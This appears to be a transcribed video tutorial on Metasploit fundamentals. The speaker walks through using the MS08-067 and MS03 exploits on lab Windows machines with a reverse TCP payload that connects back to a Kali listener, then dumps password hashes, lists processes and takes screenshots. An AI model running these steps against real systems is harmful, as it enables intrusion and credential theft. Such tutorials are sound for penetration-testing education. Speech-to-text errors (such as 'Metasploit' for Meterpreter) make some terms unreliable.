Everyone, welcome back to my channel. So today I'm going to talk about Metasploit Framework, which is a Ruby-based modular penetration testing platform that enables you to write, test, and even execute exploit code. And this framework is really cool. Contains a suite of tools that you can use to test security vulnerabilities. You can even enumerate networks, execute attacks, and evade detection. And the core, the Metasploit framework, is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. Now, in this session, we're going to talk about the Metasploit fundamentals. So I'm going to talk about MSF console, then the exploits, the payloads, databases, and then finally Metasploit. Okay. All right. So let me fire up my virtual machine. So I'm currently using Kali 2020, and let's just do some checking. Basic tests. Okay, so I got the what do you call this? The target. Yeah. Okay. Now to launch the Metasploit framework, the console, you can just type MSF console, and yeah, we got a warning, no database support. So if we got this error, you can just type exit, and then we'll try to run the MSF DB initialize. Oh, sorry, I need to run it as root, so just use the sudo sudo msf db, then initialize. It will start database already configured, then launch MSF console. So MSF console, I believe, is the core engine of the Metasploit framework, which allows you to do a lot of things. As you can see here, we got exploits, modules, auxiliary modules, post-exploitation modules, payloads, encoders, the Noobs, the evasions. Okay, so if you don't know anything, you can just type help, and it will bring you to the help information that will allow you to find anything that you want. We have core commands like banner, CD, color, yeah, and so on. We got module commands, advanced, back, info, load path, search, show. We also have job commands. Then we have resource script commands. Then we also have database backend commands, which is very useful if you want to, for example, import the scan result based on Nmap, and others like credentials backup, backend commands, developer commands, and also more information, which is informing us about the primary interface for the Metasploit framework, the MSF console, and so on and so forth. Yeah, so we got some examples here. Yeah, so please do some reading regarding the examples. Okay, so let's try some of the basic commands. Like, for example, here, just type banner Okay, so we got nice banner. And then perhaps if you want to control the color, you can just type color. This will enable you to toggle the color, like for example put the auto. And if you want to search for example exploits, you can just type show exploits. Yeah, you can just type show, then exp, then press tab. Yeah, it will auto complete, and have to wait for a while because it has a lot of exploit modules here. So we have about 1,989 exploit, 1,089 auxiliary modules, and the rest are post-exploitation modules, payloads, encoders, and so on. Yeah. So we have a bunch of exploits. Yeah. So we can just type clear to clear the screen, and if you want to see the list of payloads, you can just type show payloads. Sorry, so let me just repeat. Show exploits will actually show all of the exploits modules. Now these modules are the modules that will be used to exploit a specific target. Okay, and then within the exploit you will need to select the payload. So if you want to see all of the payloads, what you can do is you can just type show payloads. Just type pay and then press tab, and bingo, we got the payloads. We also have the auxiliary modules, so just type show auxiliary aux. Yeah, just type or press tab. Auxiliary modules are modules that can be used to assist the penetration testers and ethical hackers to actually do a lot of things. Like for example, we can do port scanning, SMB login brute force, or maybe just trying to find some services running on the target machines. Yeah, identifying the operating systems and so on and so forth. Yeah, so you can just type show auxiliary to show all of the auxiliary modules. Okay, and by the way, if you look at the let me just clear the screen and then type show exploits. As you can see, that exploits are actually arranged based on categories. Okay, like for example, we got this Windows. This is actually the architecture or the operating systems. This is the service name, and the rest would be the actual module name. Yeah, so you may find like Linux. Yeah. So for example, you can just type clear, and then you can use the search command. If you want to search for example, Linux, show me all of the modules related to Linux. Okay, and we can also show, for example, Windows. Oh, sorry, search for Windows. Yeah, so you can see that we can easily find Windows related modules, which also include the exploit modules, auxiliary modules, and post-exploitation modules. Okay. All right, so let's try to perhaps what do you call this, do an example of how we can find and utilize this Metasploit framework to find a specific exploit for a specific, you know, target and exploit based on specific vulnerability. So for example, I want to search for the vulnerability, or sorry, the exploit related to the vulnerability on Microsoft the SMB. So use the search SMB. Okay, and notice that we got some here. So let's say, to be more precise, I want to find out about the Windows exploit module related to, let's say, MS-08067, which is this. Yeah, so you can actually search based on this. Just type MS-08. Yeah, you can search for the MS-08. And Metasploit will actually show all of the matching modules, which include auxiliary, and yeah, we got 2 auxiliary modules and 5 exploit modules. Okay, now let's try to use one of this. Okay, so to know more about the module, type info and then the name of the module. Of course, you can copy and paste the module name to make it easier for you. Okay, so press enter, and you can see that it has the explanation about what is this module about. So MS-08067, Microsoft Server Service Relatives POP Stack Corruption. Okay, so it has a lot of targets identified by the ID from 0 up to 72. And you can specify the R host. These are the basic options that you need to enter. The R host, you need to specify the target host, which can be, range of the address based on the CIDR or clustless inter-domain routing. And you can also specify the file if you want. And you can also specify the port. By default is 445, which is actually SMB service. And the rest would be like SMB pipe, which is by default set to browser. Okay, so we'll use the target 0 automatic targeting. So what you need to do is you just type use and the name of the exploit, which is the, sorry, let me just repeat. Okay, so let me copy again. Search for MS-08, because we already know what is this module used for. Next is type use space and the name of the module. Now, if you don't know what to do here, you can just type show options, which will allow you to look at all of the available options that you need to put or enter. And here we need to specify perhaps the payload, because normally we need to use or select the name of the exploit module followed by the payload. Of course, the payload is set by default to, let's say, Metasploit, but you can of course set it to something else. Like, for example, you can just type set payload space Windows. And as you can see that we can search for any payloads available. By the way, this is my favorite payload, so we just use the payload, set payload Windows, Metasploit. And then you can also use the bind TCP, for example. Or my favorite is reverse TCP that allows me to connect back or call home. So this Metasploit reverse TCP will allow you to tell the client to connect back to your Kali. And then after you have set up the payload, next you can just type show options. And notice that we need to specify the R host. We also need to specify the L host, which is the listening address. R host is our target address. And then you can also specify different port that will listen to our connection. So I'll set the R host. Yeah, so last time I did create a file that has the list of IP addresses of my targets. So I will use this file equals to home tags and then targets. Yeah. So this is the list of targets, which contains the, let me just check. So you can look at the targets, cat/targets. So these are my targets, and you did specify this in this R host, within the R host, and then you need to specify the L host, which is our Kali that will, this is actually the listening address, which is referring to our Kali. So just use the 131.107.1.252. And for the port, because we are about to connect back from the target to Kali, it is actually recommended to use, commonly used open port on your target machine. So you can set something like set L port, let's say 443, or maybe like 8080, up to you. Yeah. So we just set 443 for the meantime. And for the target, it was already set to 0. You can even specify like set target 0, just to repeat. And let me check the connection first before I execute. Yeah, we still have the same IP. So just type, now we can just type check if you want. This is just to check if target is vulnerable. Yeah. So the command check will allow you to check whether your target is vulnerable to our exploit. So the next thing to do is to type exploit, which is the command to execute the exploit code against the target machines. It looks like 443 is not accepted, permission denied. So let me just set our port to, let's say, 5555, any port, and exploit. All right. So we got one Metasploit session open here. Yeah, and if you want to see all of the open session, you can just type sessions-l. That will list the open sessions, and you can just type sessions-h. Oh, sorry, h, to look at the options. Okay, so L is to list all of the active session, and if you want to interact with the session, you can just use the I and the session ID. So for example, session ID 1, so we can just type session-I and then 1. Yeah, if you want to see the all active session verbosely, you can just type sessions-v. Yeah. And you can also use the X to see the extended information. And if you want to interact with the session, just type session-i and then 1, which is the active session. Now we got the Metasploit. And as you know that Metasploit, or maybe if you don't know, Metasploit is a very intelligent payload that can be used to do many things. And inside Metasploit, by the way, is the DLL that has a lot of functionalities or features. And if you don't know anything about the Metasploit, and if you're already inside Metasploit, you can just type help. And you can look at the commands. We got system commands, networking commands, file system commands, core commands like background, BG, channel, help, info, run, secure, session, use, transfer, sleep, write, upload, download, root, netstat, and so on. So we got networking, system, user interface command, screenshot, for example, webcam, and so on. Even like audio commands, elevate commands, hash dump, timestamp, and so on. So let's try. So let's try by typing sysinfo. This will give you the information about the target. See, we can actually get the information on the target machine. So it says that, let me see, what's this? Why is it not running correctly? So just use the, oops, died. You can even try to exploit again one more time. So something wrong with the address. Let me just retype my IP just to make it clear, and then re-exploit. So if you want to exploit a specific host only, you can just type set our host. For example, my target is, for example, 131.107.1. Let's say 101, and you can just type exploit. Or maybe change this to, let's say, 254 exploit. It's unreachable. Let me see. Oops, what's this? Looks like my target was crashed. Or maybe let me just repeat. Let me reset this for a while. So we have already discussed MSF console, the exploits, the payloads. Also, we'll discuss databases later on, and then now we're discussing Metasploit. Okay, just give me a minute. Try again. Let me set the IP address. Okay, let me ping again. Sorry, I'm not sure what's the problem here. Looks like my target is not responding. So hang on for a while. Okay, so let me just try 101. Yeah, set our host as one of my target. You can choose your own target exploit. Now, sometimes you got this exploit completed, but no session was created. It might be because the target does not actually accept, or it was not successfully exploited. Okay, so let's try again another target. Well, maybe like 111. Yeah, this one. Okay, so I'm changing my target to 111. So set our host and exploit. Okay, so it might be because of the target which was not actually successfully exploited. So we need to change this. So yeah, so for example, you can type back and then you just type search for SMB version. So we need to test the version number, so I will use this. Use this and then set our host and run. So right now I'm using the auxiliary scanner to find the version, and let me just type show options. Yeah, we got the R host, but we were not able to get the version, so it's okay. Just type run again to see, nothing much, and just type back and then search again the SMB MS08, or maybe you can use something else like MS03, which is very famous. Yeah, so I will be using this. See, we can actually use this against our target. Set our host, well, specific hosts rather than one set of hosts. Show options to see whether we have successfully set. So we got our host set. We will use the payload again. Set payload Windows Metasploit reverse TCP. So if you don't know which payload you need to choose, you can just always use Metasploit reverse TCP, which is one of my favorites payload. Yeah, so we'll show options, and you need to specify the L host, which is still blank. Set L host, which is referring to our Kali, and just leave the port or maybe set the L port to 5555 and exploit. Bingo. We got the Metasploit session. Now just type sessions -l. So you got only, well, sorry, -i. Oh, we already have the sessions. Yeah, so we don't need to do the session. But if you, in case you type exit and then you want to get back to the session, you can always do the exploit. And if you want to exit without leaving the session, you can just type background. This will background the session, and you can always go back by typing session -i and then 3. This will show me or show you the active session. Yeah. From there, you can just type, like, for example, sysinfo. Yeah, that will tell me that, oh, okay, this is the operating system, blah, blah, blah. You can always use the IP config, any commands available. Just type help. You can always use like #dump to see all of the hashes. You can even look at the processes by typing ps, and even the screenshot by typing screenshot. Yeah, so you can copy this and open up, copy the selection, and then you can always open a browser to see the content of the image. Okay, so we got this Windows, and you can just tap help again to see other commands, like maybe if you want to do like screen share, or maybe like download, upload. Yeah, you can use the upload command. Yeah, networking command, upload command, upload file. So for example, if you like to put a file, so let's say we go to, you just type nano, let's say hacked.txt, just type hacked, save it. And if you want to upload this hack.txt to your target, what you can do is you can just type upload. Oh, sorry. What's the help, or maybe something like, oh, something wrong with this command. Anyway, so we can try all of the commands, such as the upload earlier, or just type shell. Must be small. Okay. Yeah, the present session died again. Yeah, so you can of course repeat to exploit, for example. But it seems that the 101 connection is closed, so we can repeat this at any time. So anyway, so again, just to repeat that, provided that your exploit is successful, then you will get the Metasploit. Then you can use all of the available commands on Metasploit to do a lot of things, like dumping the hashes, uploading the files, taking the screenshot, and so on and so forth. Yeah. So again, let me just repeat. Yeah, a lot of commands that you need to understand to really utilize the MSF console, which is the core what do you call this, module or engine on your Metasploit framework. And if you don't know anything, don't forget, just type help. Yeah, And again, if you need to search for specific, let's say, payloads, you can always use different payloads. Yeah, so like for example, show payloads earlier. That will allow you to search for a specific payload. Yeah. Okay. Now I will be discussing the next level of, I would say, skill on how to really utilize our Metasploit. Now this time I'm actually utilizing my Windows, but next time I'll be utilizing my Linux, so that we can also see that whichever operating systems on your target machines can be, explored by, or even exploited and explored by utilizing this Metasploit framework. All right, so that's all for this session, and let me get back to you on the next sessions related to Metasploit fundamental or basics. All right, so see you next time.